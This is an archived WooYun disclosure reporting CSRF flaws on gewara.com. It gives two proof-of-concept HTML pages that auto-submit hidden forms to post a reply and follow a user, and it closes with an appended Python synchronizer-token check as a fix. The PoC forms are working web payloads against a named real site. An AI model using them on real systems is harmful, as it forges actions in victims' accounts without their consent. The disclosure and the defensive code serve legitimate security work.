WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-07-20: Details have been sent to the vendor and are awaiting the vendor's handling. 2015-07-25: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Somewhat impactful
Posting a movie review, replying to one, editing personal information, and following a user are all vulnerable to CSRF. Taking reply and follow as examples. Reply:
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>this is a crsf test</title>
</head><body>
<form action="http://www.gewara.com/activity/ajax/sns/replyComment.xhtml" method="Post">
  <input type="hidden" name="body" value="test" /> <!-- reply content -->
  <input type="hidden" name="commentid" value="93796763" /> <!-- review id -->
</form>
<script> document.forms[0].submit(); </script>
</body></html>
Success
Follow
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>this is a crsf test</title>
</head><body>
<form action="http://www.gewara.com/activity/community/ajax/addAttention.xhtml" method="Post">
  <input type="hidden" name="attentionid" value="46343616" /> <!-- id of the user being followed -->
</form>
<script> document.forms[0].submit(); </script>
</body></html>
Followers +1
Add a token
Hazard level: No impact (vendor ignored)
Ignored at: 2015-07-25 11:44
None yet
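As an added illustration of the fix proposed above (not code from this report or from gewara.com), a synchronizer-token check that rejects auto-submitted cross-site forms like the ones in this report, which carry no token. The field name csrf_token, the handler and the session identifiers are assumptions.

```python
import hashlib
import hmac
import secrets

# Server-side key used to derive per-session tokens (constructed for this example).
SECRET_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Derive the token bound to one session (synchronizer-token pattern).

    The server embeds this value as a hidden csrf_token field in its own
    forms; a third-party page cannot read it, so it cannot forge the field.
    """
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def is_csrf_valid(session_id: str, form: dict) -> bool:
    """True only if the form carries the token derived for this session."""
    submitted = form.get("csrf_token")
    if not submitted:
        # Exactly the case of the PoC above: the forged form has no token field.
        return False
    expected = issue_csrf_token(session_id)
    # Constant-time comparison so the check does not leak the token byte by byte.
    return hmac.compare_digest(submitted, expected)


def handle_reply_comment(session_id: str, form: dict) -> tuple[int, str]:
    """Hypothetical handler for replyComment.xhtml with the token check in front."""
    if not is_csrf_valid(session_id, form):
        return 403, "CSRF token missing or invalid"
    return 200, f"reply posted to comment {form.get('commentid')}"


if __name__ == "__main__":
    sid = "victim-session"
    forged = {"body": "test", "commentid": "93796763"}      # the PoC's form fields
    print(handle_reply_comment(sid, forged))                # (403, ...)
    legit = dict(forged, csrf_token=issue_csrf_token(sid))  # the site's own form
    print(handle_reply_comment(sid, legit))                 # (200, ...)
```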